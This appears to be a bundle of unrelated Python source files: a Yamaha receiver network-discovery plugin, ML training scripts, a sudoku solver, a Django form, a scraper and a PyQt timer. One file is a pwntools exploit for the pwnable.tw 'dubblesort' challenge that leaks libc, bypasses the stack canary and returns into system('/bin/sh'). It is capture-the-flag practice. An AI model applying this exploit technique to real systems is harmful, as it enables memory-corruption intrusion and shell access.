return self.ip_address
except:
eg.PrintError("Yamaha Receiver Not Found [{0}]!".format(self.ip_address))
return None
def get_lan_ip():
"""
Attempts to open a socket connection to Google's DNS
servers in order to determine the local IP address
of this computer. Eg, 192.168.1.100
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8",80))
ip = s.getsockname()[0]
s.close()
return ip
except:
return "192.168.1.100"
def get_network_prefix():
"""
Returns the network prefix, which is the local IP address
without the last segment, Eg: 192.168.1.100 -> 192.168.1
"""
lan_ip = get_lan_ip()
return lan_ip[:lan_ip.rfind('.')]
def auto_detect_ip_threaded(self):
"""
Blasts the network with requests, attempting to find any and all yamaha receivers
on the local network. First it detects the user's local ip address, eg 192.168.1.100.
Then, it converts that to the network prefix, eg 192.168.1, and then sends a request
to every ip on that subnet, eg 192.168.1.1 -> 192.168.1.254. It does each request on
a separate thread in order to avoid waiting for the timeout for every 254 requests
one by one.
"""
self.FOUND_IP = None
threads = []
# Get network prefix (eg 192.168.1)
net_prefix = get_network_prefix()
ip_range = create_ip_range(net_prefix + '.1', net_prefix + '.254')
for ip in ip_range:
t = Thread(target=try_connect, kwargs={'self':self, 'ip':ip})
t.daemon = True
threads.append(t)
t.start()
for t in threads:
if self.FOUND_IP is not None:
break
else:
t.join()
if self.FOUND_IP is not None:
print "Found Yamaha Receiver IP: {0} [{1}]".format(self.FOUND_IP, self.MODEL)
else:
eg.PrintError("Yamaha Receiver Was Not Found!")
return self.FOUND_IP
def try_connect(self, ip):
"""
Used with the auto-detect-ip functions, determines if a yamaha receiver is
waiting at the other end of the given ip address.
"""
#print "value in self.active_zone " + str(self.active_zone)
#print "try connect " + ip
try:
model = yamaha.get_config_string(self,'Model_Name', timeout=self.auto_detect_timeout, ip=ip, print_error=False)
print '{0}: {1}'.format(ip, model)
if self.auto_detect_model in ["ANY", "", None] or model.upper() == self.auto_detect_model.upper():
self.FOUND_IP = ip
self.MODEL = model
except:
pass
def create_ip_range(range_start, range_end):
"""
Given a start ip, eg 192.168.1.1, and an end ip, eg 192.168.1.254,
generate a list of all of the ips within that range, including
the start and end ips.
"""
ip_range = []
start = int(range_start[range_start.rfind('.')+1:])
end = int(range_end[range_end.rfind('.')+1:])
for i in range(start, end+1):
ip = range_start[:range_start.rfind('.')+1] + str(i)
ip_range.append(ip)
return ip_range
def convert_zone_to_int(self, zone, convert_active=False):
"""
Convert a zone name into the integer value that it represents:
Examples:
Active Zone: -1
Main Zone: 0
Zone 2: 2
Zone A: -65 (this is the negative version of the integer that represents this letter: 'A' -> 65, thus -65)
"""
if zone == 'Main Zone' or zone == 'Main_Zone' or zone == 'MZ':
return 0
elif 'active' in zone.lower():
# -1 means active zone
if convert_active:
return self.active_zone
else:
return -1
else:
z = zone.replace('Zone_', '').replace('Zone', '').replace('Z', '').strip()
if z in [ 'A', 'B', 'C', 'D' ]:
return -1 * ord(z)
return int(z)
def open_to_close_tag(tag):
"""
Given an opening xml tag, return the matching close tag
eg. '<YAMAHA_AV cmd="PUT"> becomes </YAMAHA_AV>
"""
index = tag.find(' ')
if index == -1:
index = len(tag) - 1
return '</' + tag[1:index] + '>'
def close_xml_tags(xml):
"""
Automagically takes an input xml string and returns that string
with all of the xml tags properly closed. It can even handle when
the open tag is in the middle of the string and not the end.
"""
output = []
stack = []
xml_chars = deque(list(xml))
c = None
while len(xml_chars) > 0:
while len(xml_chars) > 0 and c != '<':
c = xml_chars.popleft()
if c != '<':
output.append(c)
if c == '<':
temp = [ '<' ]
c = xml_chars.popleft()
end_tag = c == '/'
while c != '>':
temp.append(c)
c = xml_chars.popleft()
temp.append('>')
tag = ''.join(temp)
if end_tag:
other_tag = stack.pop()
other_close_tag = open_to_close_tag(other_tag)
while other_close_tag != tag:
output.append(other_close_tag)
other_tag = stack.pop()
other_close_tag = open_to_close_tag(other_tag)
elif not tag.endswith('/>'):
# Only add to stack if not self-closing
stack.append(tag)
output.append(tag)
while len(stack) > 0:
tag = stack.pop()
output.append(open_to_close_tag(tag))
return ''.join(output)
def setup_availability(self, **kwargs):
"""
Query the receiver to see which zones and inputs it supports.
Should be called after a successful ip check.
"""
xmldoc = yamaha.get_system_config(self, **kwargs)
zones = []
inputs = []
for node in xmldoc.getElementsByTagName("Feature_Existence"): #just in case there are multiple "Feature" sections
x = 0
stop = False
while stop==False:
try:
if node.childNodes[x].firstChild.data != "0":
if node.childNodes[x].tagName != "Main_Zone" and node.childNodes[x].tagName[:4] != "Zone":
inputs.append(str(node.childNodes[x].tagName))
else:
zones.append(str(node.childNodes[x].tagName))
except:
stop=True
x = x + 1
self.AVAILABLE_FEATURE_SOURCES = list(inputs)
self.AVAILABLE_INFO_SOURCES = list(inputs)
#models from RX-V use this
x = 0
for node in xmldoc.getElementsByTagName("Input"):
stop = False
while stop==False:
try:
self.AVAILABLE_SOURCES_RENAME.append([str(node.childNodes[x].tagName), str(node.childNodes[x].firstChild.data)])
self.AVAILABLE_INPUT_SOURCES.append(str(node.childNodes[x].firstChild.data))
inputs.append(str(node.childNodes[x].firstChild.data))
except:
stop=True
x = x + 1
#models from N-Line use this
if x == 0: #this means the other lookup resulted in nothing
MainInputxmldoc = yamaha.get_main_zone_inputs(self)
x = 0
for node in MainInputxmldoc.getElementsByTagName("Input_Sel_Item"):
stop = False
while stop==False:
try:
self.AVAILABLE_SOURCES_RENAME.append([str(node.childNodes[x].tagName), str(node.childNodes[x].firstChild.data)])
self.AVAILABLE_INPUT_SOURCES.append(str(node.childNodes[x].firstChild.firstChild.data))
inputs.append(str(node.childNodes[x].firstChild.firstChild.data))
except:
stop=True
x = x + 1
self.AVAILABLE_ZONES = [ zone.replace('_', ' ') for zone in zones ]
self.AVAILABLE_SOURCES = [ input.replace('_', ' ') for input in inputs ]
#self.AVAILABLE_SOURCES = list(set(self.AVAILABLE_SOURCES))
tempList =[]
for source in self.AVAILABLE_SOURCES_RENAME:
tempList.append([source[0].replace('_',''),source[1].replace('_','')])
self.AVAILABLE_SOURCES_RENAME = list(tempList)
def get_available_zones(self, include_active, fallback_zones, limit=None):
"""
Returns the zones that are marked as available based on availability, and
optionally includes an active zone. If zone availability info is not present,
this will return fallback_zones. Optionally a limit can be imposed to only show
a certain amount of zones if the code does not support the extra zones yet.
"""
if len(self.AVAILABLE_ZONES) > 0:
if limit is not None and limit < len(self.AVAILABLE_ZONES):
# For example, limit to only 2 zones
zones = [ self.AVAILABLE_ZONES[i] for i in range(limit) ]
else:
# Must use list() to create a copy
zones = list(self.AVAILABLE_ZONES)
if include_active:
return ['Active Zone'] + zones
else:
return zones
else:
return fallback_zones
|
import numpy as np
import numba
# gradients for one element of the loss function's sum, don't call this directly
@numba.jit(nopython=True)
def ABCD_grad(xa, ya, xb, yb, xc, yc, xd, yd, dab, dac, dad, dbc, dbd, dcd, pab):
sum_dist = dab + dac + dad + dbc + dbd + dcd
dr_ab = (dab/sum_dist)
gxA = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xa-xb)/dab + (xa-xc)/dac + (xa-xd)/dad ) - (xa-xb)/dab )
gyA = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((ya-yb)/dab + (ya-yc)/dac + (ya-yd)/dad ) - (ya-yb)/dab )
gxB = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xb-xa)/dab + (xb-xc)/dbc + (xb-xd)/dbd ) - (xb-xa)/dab )
gyB = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yb-ya)/dab + (yb-yc)/dbc + (yb-yd)/dbd ) - (yb-ya)/dab )
gxC = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xc-xa)/dac + (xc-xb)/dbc + (xc-xd)/dcd ))
gyC = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yc-ya)/dac + (yc-yb)/dbc + (yc-yd)/dcd ))
gxD = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((xd-xa)/dad + (xd-xb)/dbd + (xd-xc)/dcd ))
gyD = 2*((pab - dr_ab)/sum_dist) * ((dab/sum_dist) * ((yd-ya)/dad + (yd-yb)/dbd + (yd-yc)/dcd ))
return gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD
# quartet gradients for a 2D projection, Dhd contains the top-right triangle of the HD distances
# the points are named a,b,c and d internaly to keep track of who is who
# points shape: (4, 2)
# Dhd shape : (6,)
@numba.jit(nopython=True)
def compute_quartet_grads(points, Dhd):
xa, ya = points[0]
xb, yb = points[1]
xc, yc = points[2]
xd, yd = points[3]
# LD distances, add a small number just in case
d_ab = np.sqrt((xa-xb)**2 + (ya-yb)**2) + 1e-12
d_ac = np.sqrt((xa-xc)**2 + (ya-yc)**2) + 1e-12
d_ad = np.sqrt((xa-xd)**2 + (ya-yd)**2) + 1e-12
d_bc = np.sqrt((xb-xc)**2 + (yb-yc)**2) + 1e-12
d_bd = np.sqrt((xb-xd)**2 + (yb-yd)**2) + 1e-12
d_cd = np.sqrt((xc-xd)**2 + (yc-yd)**2) + 1e-12
# HD distances
pab, pac, pad, pbc, pbd, pcd = Dhd[0], Dhd[1], Dhd[2], Dhd[3], Dhd[4], Dhd[5]
# for each element of the sum: use the same gradient function and just permute the points given in input
gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD = ABCD_grad(
xa, ya, xb, yb, xc, yc, xd, yd,\
d_ab, d_ac, d_ad, d_bc, d_bd, d_cd,\
pab)
gxA2, gyA2, gxC2, gyC2, gxB2, gyB2, gxD2, gyD2 = ABCD_grad(
xa, ya, xc, yc, xb, yb, xd, yd,\
d_ac, d_ab, d_ad, d_bc, d_cd, d_bd,\
pac)
gxA3, gyA3, gxD3, gyD3, gxC3, gyC3, gxB3, gyB3 = ABCD_grad(
xa, ya, xd, yd, xc, yc, xb, yb,\
d_ad, d_ac, d_ab, d_cd, d_bd, d_bc,\
pad)
gxB4, gyB4, gxC4, gyC4, gxA4, gyA4, gxD4, gyD4 = ABCD_grad(
xb, yb, xc, yc, xa, ya, xd, yd,\
d_bc, d_ab, d_bd, d_ac, d_cd, d_ad,\
pbc)
gxB5, gyB5, gxD5, gyD5, gxA5, gyA5, gxC5, gyC5 = ABCD_grad(
xb, yb, xd, yd, xa, ya, xc, yc,\
d_bd, d_ab, d_bc, d_ad, d_cd, d_ac,\
pbd)
gxC6, gyC6, gxD6, gyD6, gxA6, gyA6, gxB6, gyB6 = ABCD_grad(
xc, yc, xd, yd, xa, ya, xb, yb,\
d_cd, d_ac, d_bc, d_ad, d_bd, d_ab,\
pcd)
gxA = gxA + gxA2 + gxA3 + gxA4 + gxA5 + gxA6
gyA = gyA + gyA2 + gyA3 + gyA4 + gyA5 + gyA6
gxB = gxB + gxB2 + gxB3 + gxB4 + gxB5 + gxB6
gyB = gyB + gyB2 + gyB3 + gyB4 + gyB5 + gyB6
gxC = gxC + gxC2 + gxC3 + gxC4 + gxC5 + gxC6
gyC = gyC + gyC2 + gyC3 + gyC4 + gyC5 + gyC6
gxD = gxD + gxD2 + gxD3 + gxD4 + gxD5 + gxD6
gyD = gyD + gyD2 + gyD3 + gyD4 + gyD5 + gyD6
return gxA, gyA, gxB, gyB, gxC, gyC, gxD, gyD
|
t = int(input())
while t > 0:
n = int(input())
if n == 1:
print(9)
elif n ==2:
print(98)
else:
print("989",end="")
for i in range(1,n-2,+1):
print((i-1)%10,end="")
print("\t")
t = t-1
|
def solve(bo):
find=find_empty(bo)
if not find:
return True
else:
row, col= find
for i in range(1, 10):
if valid(bo, i, (row, col)):
bo[row][col]=i
if solve(bo):
return True
bo[row][col]=0
return False
def valid(bo, num, pos):
#check column
for i in range(len(bo)):
if bo[i][pos[1]]==num and pos[0]!=i:
return False
#check row
for i in range(len(bo[0])):
if bo[pos[0]][i]==num and pos[1]!=i:
return False
#check cube
cube_x=pos[1] // 3
cube_y=pos[0] // 3
for i in range(cube_y*3, cube_y*3+3):
for j in range(cube_x*3, cube_x*3+3):
if bo[i][j]==num and (i, j)!=pos:
return False
return True
def find_empty(bo):
for i in range(len(bo)):
for j in range(len(bo[0])):
if bo[i][j]==0:
return (i, j)
return None
|
import time
from sklearn.ensemble import BaggingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
def bootstrap(data_train, data_test, target_train, target_test):
time1 = time.time()
bsclf = BaggingClassifier(
DecisionTreeClassifier(max_depth=5),
n_estimators=10)
print "begin fit"
bsclf.fit(data_train, target_train)
print "end fit"
time2 = time.time()
pred = bsclf.predict(data_test)
print "end pred"
precision = precision_score(target_test, pred)
recall = recall_score(target_test, pred)
f1 = f1_score(target_test, pred)
return [precision, recall, f1, time2-time1]
|
import pytest
from ai.backend.client.session import Session
# module-level marker
pytestmark = pytest.mark.integration
@pytest.mark.asyncio
async def test_list_agent():
with Session() as sess:
result = sess.Agent.list_with_limit(1, 0)
assert len(result['items']) == 1
|
import os
import torch
import numpy as np
import argparse
import random
import yaml
from easydict import EasyDict
import gensim
import torch.utils.data as data
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.nn as nn
from tensorboardX import SummaryWriter
import data_helpers
from models.standard import Origin
def generate_list(text_raw):
word_list = []
word = ""
for i in text_raw:
if (i != u" "):
word = word + i
else:
word_list.append(word)
word = ""
word_list.append(word)
return ' '.join(word_list)
def load_text(x_text, name):
text_list = []
for x in x_text:
x_u = str(x)
xlist = generate_list(x_u)
text_list.append(xlist)
max_document_length = max([len(text.split(" ")) for text in text_list])
print("max_document_length in " + name + " set:")
print(max_document_length)
print("using word2vec to embed words in " + name + " set...")
model = gensim.models.KeyedVectors.load_word2vec_format('./alldata/vectors300.txt', binary=False)
print("embedding completed.")
# print(text_list)
all_vectors = []
embeddingUnknown = [0 for i in range(config.embedding_dim)]
if not os.path.exists('./alldata/x_text_' + name + '.npy'):
print("constructing x_text_" + name + "....")
for text in text_list:
this_vector = []
text = text.split(" ")
if len(text) < max_document_length:
text.extend(['<PADDING>'] * (max_document_length - len(text)))
for word in text:
if word in model.index2word:
this_vector.append(model[word])
else:
this_vector.append(embeddingUnknown)
all_vectors.append(this_vector)
print(len(all_vectors))
x_text = np.array(all_vectors)
print("construction completed.")
print("saving x_text_ " + name + "...")
np.save("./alldata/x_text_" + name + ".npy", x_text)
print("x_text saved.")
else:
print("loading x_text_" + name + ".....")
x_text = np.load("./alldata/x_text_" + name + ".npy")
print("x_text_" + name + " loaded.")
return x_text
class ImageFolder(data.Dataset):
def __init__(self, x_text, x_image, x_user, y):
self.x_text = x_text
self.x_image = x_image
self.x_user = x_user
self.y = y
self.x_text = torch.Tensor(self.x_text.astype("float64"))
self.x_image = torch.Tensor(self.x_image.astype("float64"))
self.x_user = torch.Tensor(self.x_user.astype("float64"))
self.y = torch.Tensor(np.array(self.y, dtype="float64"))
def __getitem__(self, index):
return self.x_text[index], self.x_image[index], self.x_user[index], self.y[index]
def __len__(self):
return len(self.x_text)
def data_prepare(config):
train_text, train_image, train_user, train_y = data_helpers.load_data_and_labels(config.train.home_data,
config.train.work_data,
config.train.school_data,
config.train.restaurant_data,
config.train.shopping_data,
config.train.cinema_data,
config.train.sports_data,
config.train.travel_data)
test_text, test_image, test_user, test_y = data_helpers.load_data_and_labels(config.val.home_data,
config.val.work_data,
config.val.school_data,
config.val.restaurant_data,
config.val.shopping_data,
config.val.cinema_data,
config.val.sports_data,
config.val.travel_data)
train_text = load_text(train_text, "train")
test_text = load_text(test_text, "test")
return train_text, test_text, train_image, test_image, train_user, test_user, train_y, test_y
def cal_acc(pred_text, y):
pred_text = (pred_text.numpy() == pred_text.numpy().max(axis=1, keepdims=1)).astype("float64")
pred_text = [np.argmax(item) for item in pred_text]
y = [np.argmax(item) for item in y]
pred_text, y = np.array(pred_text), np.array(y)
per_text = pred_text == y
text_acc = len(per_text[per_text == True]) / len(per_text) * 100
return text_acc
def save_state(state, path, epoch):
print("=> saving checkpoint of epoch " + str(epoch))
torch.save(state, path + 'params_' + str(epoch) + '.pth')
def load_state(path, netF, optimizerF):
if not os.path.isfile(path):
print("=> no checkpoint found at '{}'".format(path))
else:
print("=> loading checkpoint '{}'".format(path))
checkpoint = torch.load(path)
netF.load_state_dict(checkpoint['state_dictF'])
optimizerF.load_state_dict(checkpoint['optimizerF'])
epoch = checkpoint['epoch'] + 1
count = checkpoint['count']
return epoch, count
def main():
global args, config
parser = argparse.ArgumentParser(description='PyTorch for image-user CNN')
parser.add_argument('--config', default='config.yaml')
parser.add_argument('--resume', default='', type=str, help='path to checkpoint') # 增加属性
# parser.add_argument('--board_path', default='./board/', help='') # 增加属性
# parser.add_argument('--board_freq', default=10, help='') # 增加属性
args = parser.parse_args()
with open(args.config) as f:
config = EasyDict(yaml.load(f))
# assert torch.cuda.is_available()
# device = torch.device("cuda")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(config)
print("device:", device)
# random seed setup
print("Random Seed: ", config.seed)
random.seed(config.seed)
torch.manual_seed(config.seed)
torch.cuda.manual_seed(config.seed)
cudnn.benchmark = True
netF = Origin(config)
criterion = nn.CrossEntropyLoss()
netF = netF.to(device)
criterion = criterion.to(device)
optimizerF = optim.Adam(netF.parameters(), lr=config.lr_fusion)
last_epoch = 0
count = 0
if args.resume:
last_epoch, count = load_state(args.resume, netF, optimizerF)
tr_text_emb, test_text_emb, tr_image, test_image, tr_user, test_user, tr_y, test_y = data_prepare(config)
train_dataset = ImageFolder(tr_text_emb, tr_image, tr_user, tr_y)
train_dataloader = data.DataLoader(train_dataset, batch_size=config.batch_size,
shuffle=True, pin_memory=True, num_workers=int(config.workers))
writer = SummaryWriter(config.board_path)
for epoch in range(last_epoch, config.epoch - 1):
for iter, [text, image, user, y] in enumerate(train_dataloader):
netF.train()
netF.zero_grad()
text, image, user, y = text.to(device), image.to(device), user.to(device), y.to(device)
pred = netF(text, image, user)
err_text = criterion(pred, y.argmax(dim=1))
# print("err: ", err_text)
err_text.backward()
optimizerF.step()
count = count + 1
if (iter + 1) % config.board_freq == 0:
writer.add_scalar("Loss", err_text.item(), count)
if (epoch + 1) % config.val_freq == 0:
val(tr_text_emb, test_text_emb, tr_image, test_image, tr_user, test_user, tr_y, test_y, netF.eval(), device,
epoch, writer)
if (epoch + 1) % config.save_freq == 0:
save_state({'state_dictF': netF.state_dict(),
'optimizerF': optimizerF.state_dict(),
'epoch': epoch,
'count': count}, config.fusion_save_path, epoch)
def val(tr_text_emb, val_text_emb, tr_image, val_image, tr_user, val_user, tr_y, val_y, netF, device, epoch, writer):
tr_text = torch.Tensor(np.array(tr_text_emb, dtype="float64"))
tr_image = torch.Tensor(np.array(tr_image, dtype="float64"))
tr_user = torch.Tensor(np.array(tr_user, dtype="float64"))
tr_y = np.array(tr_y, dtype="float64")
val_text = torch.Tensor(np.array(val_text_emb, dtype="float64"))
val_image = torch.Tensor(np.array(val_image, dtype="float64"))
val_user = torch.Tensor(np.array(val_user, dtype="float64"))
val_y = np.array(val_y, dtype="float64")
tr_text, tr_image, tr_user = tr_text.to(device), tr_image.to(device), tr_user.to(device)
val_text, val_image, val_user = val_text.to(device), val_image.to(device), val_user.to(device)
with torch.no_grad():
pred_tr = netF(tr_text, tr_image, tr_user)
pred_val = netF(val_text, val_image, val_user)
tr_text_acc = cal_acc(pred_tr.cpu(), tr_y)
val_text_acc = cal_acc(pred_val.cpu(), val_y)
print("epoch " + str(epoch), " fusion accuracy | train: %.3f %% | test: %.3f %% " % (tr_text_acc, val_text_acc))
writer.add_scalar("train_accuracy", tr_text_acc, epoch)
writer.add_scalar("val_accuracy", val_text_acc, epoch)
if __name__ == "__main__":
main()
|
import re
from django import forms
from django.http import QueryDict
from django.utils.translation import ugettext_lazy as _
from ..models import artist
import datetime
from django.conf import settings
from application.library.viewer import *
class Form(forms.Form):
name = forms.CharField(required=True,widget=forms.TextInput(attrs=dict({"class":"form-control"})),label=_("Artist Name: "))
def clean(self):
error_lst = []
if 'name' in self.cleaned_data:
if self.cleaned_data["name"] == "" or self.cleaned_data["name"] == None:
error_lst.append("Please enter Artist name")
return error_lst
def getData(self,request):
data = request.GET
if 'id' in data or request.is_ajax():
d = {}
artistData = None
if 'id' in data:
artistData = artist.objects.filter(activeyn=1, id = data['id'])
elif 'term' in data:
artistData = artist.objects.filter(activeyn=1, name__startswith=data['term'])
else:
artistData = artist.objects.filter(activeyn=1)
if len(artistData) == 1 and 'id' in data:
d = {'id': int(artistData[0].id),'name': artistData[0].name}
elif 'term' in data:
d = [{'id': qx.id, 'label': qx.name, 'value': qx.name} for qx in artistData]
else:
d = [{'id':int(item.id), 'name': item.name} for item in artistData]
context = {'data': d}
else:
artist_list = None
artist_list = page(artist.objects.filter(activeyn=1).order_by("-id"), data['page'] if 'page' in data else 1)
context = {'data': artist_list}
return context
def postData(self,request):
data = request.POST
self.cleaned_data = data
if len(self.clean()) <= 0:
newArtist = artist(name=data["name"], activeyn=1, cover_image='', updated_at=str(datetime.datetime.now()))
newArtist.save()
context = {'data': str(newArtist), 'message': 'Record added', 'status': 200}
else:
context = {'invalid': self.clean(), 'message': 'Record not saved', 'status': 422}
return context
def putData(self,request):
data = QueryDict(request.body)
self.cleaned_data = data
if len(self.clean()) <= 0:
myArtist = artist.objects.filter(id=data["id"])
myArtist.update(name=data["name"], cover_image='')
context = {'data': str(myArtist), 'message': 'Data has been updated', 'status': 200}
else:
context = {'invalid': self.clean(), 'message': 'Record not saved', 'status': 422}
return context
def deleteData(self,request):
data = QueryDict(request.body)
myArtist = artist.objects.filter(id=data["id"])
myArtist.update(activeyn=0)
context = {'message': 'Selected artist has been deleted !', 'status': 200}
return context
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
elf = ELF('./dubblesort')
libc = ELF('./libc_32.so.6')
# Memory locations
bin_sh = elf.bss() + 0x100
# Byte sequence alias
A4 = 4 * b'A'
def main():
proc = remote('chall.pwnable.tw', 10101)
#proc = process(['./ld_32-2.23.so', './dubblesort'], env={'LD_PRELOAD': './libc_32.so.6'})
# Develop your exploit here
proc.recvuntil('What your name :')
proc.send(A4 * 6 + b'A') # extra A to overwrite that fucking \x00 byte
proc.recvuntil('Hello ' + 'AAAA' * 6)
libc_data = u32(proc.recv(4)) - ord('A')
libc_base = libc_data - (0xf7fc1000 - 0xf7e11000)
libc_system = libc_base + libc.sym['system']
libc_bin_sh = libc_base + list(libc.search(b'/bin/sh'))[0]
log.info('libc data start: {}'.format(hex(libc_data)))
log.info('libc base: {}'.format(hex(libc_base)))
log.info('system@libc: {}'.format(hex(libc_system)))
log.info('bin_sh@libc: {}'.format(hex(libc_bin_sh)))
proc.recvuntil('sort :')
proc.sendline(str(35).encode())
# We must make sure our payload will remain
# in the correct order after being sorted.
payload = [0x30678 if i < 24 else 0xf0000000 for i in range(32)]
payload.append(libc_system) # ret
payload.append(libc_bin_sh) # system()'s ret addr
payload.append(libc_bin_sh) # system()'s 1st arg
for i in range(35):
proc.recvuntil('number : ')
proc.sendline(b'+' if i == 24 else str(payload[i]).encode())
proc.interactive()
if __name__ == '__main__':
main()
|
from urllib2 import urlopen
#from bs4 import BeautifulSoup
import requests
import time
import os
from urlparse import unquote
from unidecode import unidecode
f = open("/home/ubuntu/pageedits/SPARK_AGG_VIEWS/Month/part-00000",'r')
lines = f.readlines()
article_list = []
not_found_list = []
for line in lines:
line = line.strip().split(',')
if line[0]:
#article_list.append(line[0][3:-1])
article = line[0][2:-1]
article = article.replace('/',"")
article_list.append(article)
cnt = 0
for article in article_list:
r = requests.get("https://tools.wmflabs.org/xtools-articleinfo/?article=%s&project=en.wikipedia.org"%(article))
if r.status_code == 200:
try:
with open('./Agg_scrapped_articles_dir/'+article+'.html','w') as outfile:
outfile.write(unicode(r.content, errors='ignore'))
cnt += 1
except IOError:
pass
elif r.status_code == 404:
not_found_list.append(article)
time.sleep(1)
if cnt == 100000:
break
with open('./Agg_scrapped_articles_dir/'+'not_found.txt','w') as outfile2:
outfile2.write(article)
outfile2.write("\n".join(not_found_list))
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, time
from PyQt4 import QtCore, QtGui
from pymouse import PyMouse
from pykeyboard import PyKeyboard
class ScreenSaverPreventer(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.key = PyKeyboard()
def doSomething(self):
self.key.press_key(self.key.control_l_key)
self.key.release_key(self.key.control_l_key)
def run(self):
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.doSomething)
self.timer.start(59000) # 59 sec
def stop(self):
self.timer.stop()
class TimerWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(TimerWindow, self).__init__(parent)
self.label = QtGui.QLabel()
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
font=QtGui.QFont()
font.setPixelSize(60)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.stopButton = QtGui.QPushButton("&Stop")
self.stopButton.setFixedWidth(60)
self.stopButton.setStyleSheet("margin-bottom: 10px;padding: 4px;")
self.stopButton.clicked.connect(self.stop)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.label)
layout.addWidget(self.stopButton, alignment=QtCore.Qt.AlignHCenter)
self.setLayout(layout)
self.resize(400, 400)
self.screen_saver_preventer=ScreenSaverPreventer()
def run(self, sec, countdown3):
self.sec = sec
self.countdownConfig = countdown3
self.countdown3Init()
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.update)
self.timer.start(1001) # Magic number
self.screen_saver_preventer.run()
def stop(self):
self.timer.stop()
self.config_window = ConfigWindow()
self.config_window.move(self.pos())
self.config_window.show()
self.screen_saver_preventer.stop()
self.close()
def mainUpdateInit(self):
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#49f;}\
TimerWindow {background-color:#fff; border-bottom:10px solid #49f}\
QLabel {color:#777;}")
self.now = self.sec
self.mode = 'mainCountdown'
self.update()
def update(self):
self.label.setText(str(self.now))
self.now -= 1
if self.now == -1: # When Time's up
if (self.mode == 'countdown3' or # If currently is counting 3 sec
self.countdownConfig == False): # If user set not countdown 3 sec
self.mainUpdateInit()
else:
self.countdown3Init()
if self.mode == 'mainCountdown':
if self.now == 60:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#af0;}\
TimerWindow {background-color:#af0;}\
QLabel {color:#fff;}")
elif self.now == 29:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#49f;}\
TimerWindow {background-color:#49f;}\
QLabel {color:#fff;}")
elif self.now == 19:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#fa0;}\
TimerWindow {background-color:#fa0;}\
QLabel {color:#fff;}")
elif self.now == 9:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#f00;}\
TimerWindow {background-color:#f00;}\
QLabel {color:#fff;}")
elif self.now == 2:
self.setStyleSheet("\
QPushButton {background-color:#fff; color:#700;}\
TimerWindow {background-color:#700}\
QLabel {color:#fff;}")
def countdown3Init(self):
self.setStyleSheet("background-color:#222;color:#eee;")
self.mode = 'countdown3'
self.now = 3
self.countdown3()
def countdown3(self):
self.label.setText(str(self.now))
self.now -= 1
if self.now == -1:
# Call main loop
self.update()
class ConfigWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(ConfigWindow, self).__init__(parent)
layout = QtGui.QGridLayout()
self.radio_buttons = QtGui.QButtonGroup(parent)
r10 = QtGui.QRadioButton("&10 Sec")
r15 = QtGui.QRadioButton("1&5 Sec")
r30 = QtGui.QRadioButton("&30 Sec")
r45 = QtGui.QRadioButton("&45 Sec")
r60 = QtGui.QRadioButton("&60 Sec")
r90 = QtGui.QRadioButton("&90 Sec")
self.radio_buttons.addButton(r10)
self.radio_buttons.addButton(r15)
self.radio_buttons.addButton(r30)
self.radio_buttons.addButton(r45)
self.radio_buttons.addButton(r60)
self.radio_buttons.addButton(r90)
layout.addWidget(r10, 0, 0)
layout.addWidget(r15, 0, 1)
layout.addWidget(r30, 0, 2)
layout.addWidget(r45, 1, 0)
layout.addWidget(r60, 1, 1)
layout.addWidget(r90, 1, 2)
r30.setChecked(True)
self.countdownConfig = QtGui.QCheckBox("&Countdown")
layout.addWidget(self.countdownConfig, 2, 0, 1, 3)
startButton = QtGui.QPushButton("&Start")
layout.addWidget(startButton, 3, 2)
startButton.clicked.connect(self.positionSelector)
startButton.setDefault(True)
quitButton = QtGui.QPushButton("&Quit")
layout.addWidget(quitButton, 3, 0)
quitButton.clicked.connect(self.close)
self.setWindowTitle("Posemaniac Timer")
self.setLayout(layout)
self.setStyleSheet('''
background-color: #fff;
color: #666;
''')
desktop = QtGui.QApplication.desktop()
self.move(desktop.width() / 2 - self.width() * 0.2,
desktop.height() / 2 - self.height() * 0.2,)
def positionSelector(self):
r = self.radio_buttons.checkedId()
if r == -2:
sec = 10
elif r == -3:
sec = 15
elif r == -4:
sec = 30
elif r == -5:
sec = 45
elif r == -6:
sec = 60
elif r == -7:
sec = 90
if self.countdownConfig.checkState() == 2:
countdown3 = True
else:
countdown3 = False
self.position_selection_ui = PositionSelectionUI(sec, countdown3, self.pos())
self.close() # 不太確定會不會有問題
class PositionSelectionUI (QtGui.QWidget):
def __init__ (self, sec, countdown3, configWindowPos, parent = None):
self.sec = sec
self.countdownConfig = countdown3
# Create TimerWindow Instance
self.timer_window = TimerWindow()
self.timer_window.move(configWindowPos)
super(PositionSelectionUI, self).__init__(parent)
self.setWindowOpacity(0.7)
self.setStyleSheet("background-color:rgba(0,0,0,180)")
# Init QLabel
self.label = PositionSelectionUILabel(self)
# Init QLayout
layout = QtGui.QHBoxLayout()
layout.addWidget(self.label)
layout.setMargin(0)
layout.setSpacing(0)
